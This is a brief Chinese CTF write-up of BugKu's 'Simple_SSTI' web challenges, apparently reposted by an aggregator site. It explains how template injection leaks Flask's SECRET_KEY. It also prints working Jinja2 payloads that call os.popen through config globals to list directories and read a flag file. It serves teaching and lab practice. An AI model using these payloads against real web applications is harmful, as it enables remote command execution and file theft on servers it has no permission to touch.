BugKu_web Simple_SSTI

Posted 2021-08-19 独角授

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了BugKu_web Simple_SSTI相关的知识，希望对你有一定的参考价值。

Simple_SSTI_1

打开页面如图示，根据提示要找到一个flag的参数

先尝试构造payload，发现页面有所变化

再用F12大法瞅瞅，发现有一行提示，在flask中经常设置一个secret_key变量

查询后知道secret_key格式是config.SECRET_KEY，拿到flag！

打开页面和1一样，说明是模板注入，而且构造的payload也被执行了

上传错误语句发现是python3.7的flask模板注入

在网上搜集相关资料，找到了一些payload

文件读写：

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27输入命令%20../文件名称/%27).read()%20}}

命令执行：

/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27输入命令%20../%27).read()%20}}

先执行ls查看命令，发现有好多文件夹

接下来就尝试查看app文件夹内容

然后查看app文件夹里的flag文件，拿到flag！

/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}

以上是关于BugKu_web Simple_SSTI的主要内容，如果未能解决你的问题，请参考以下文章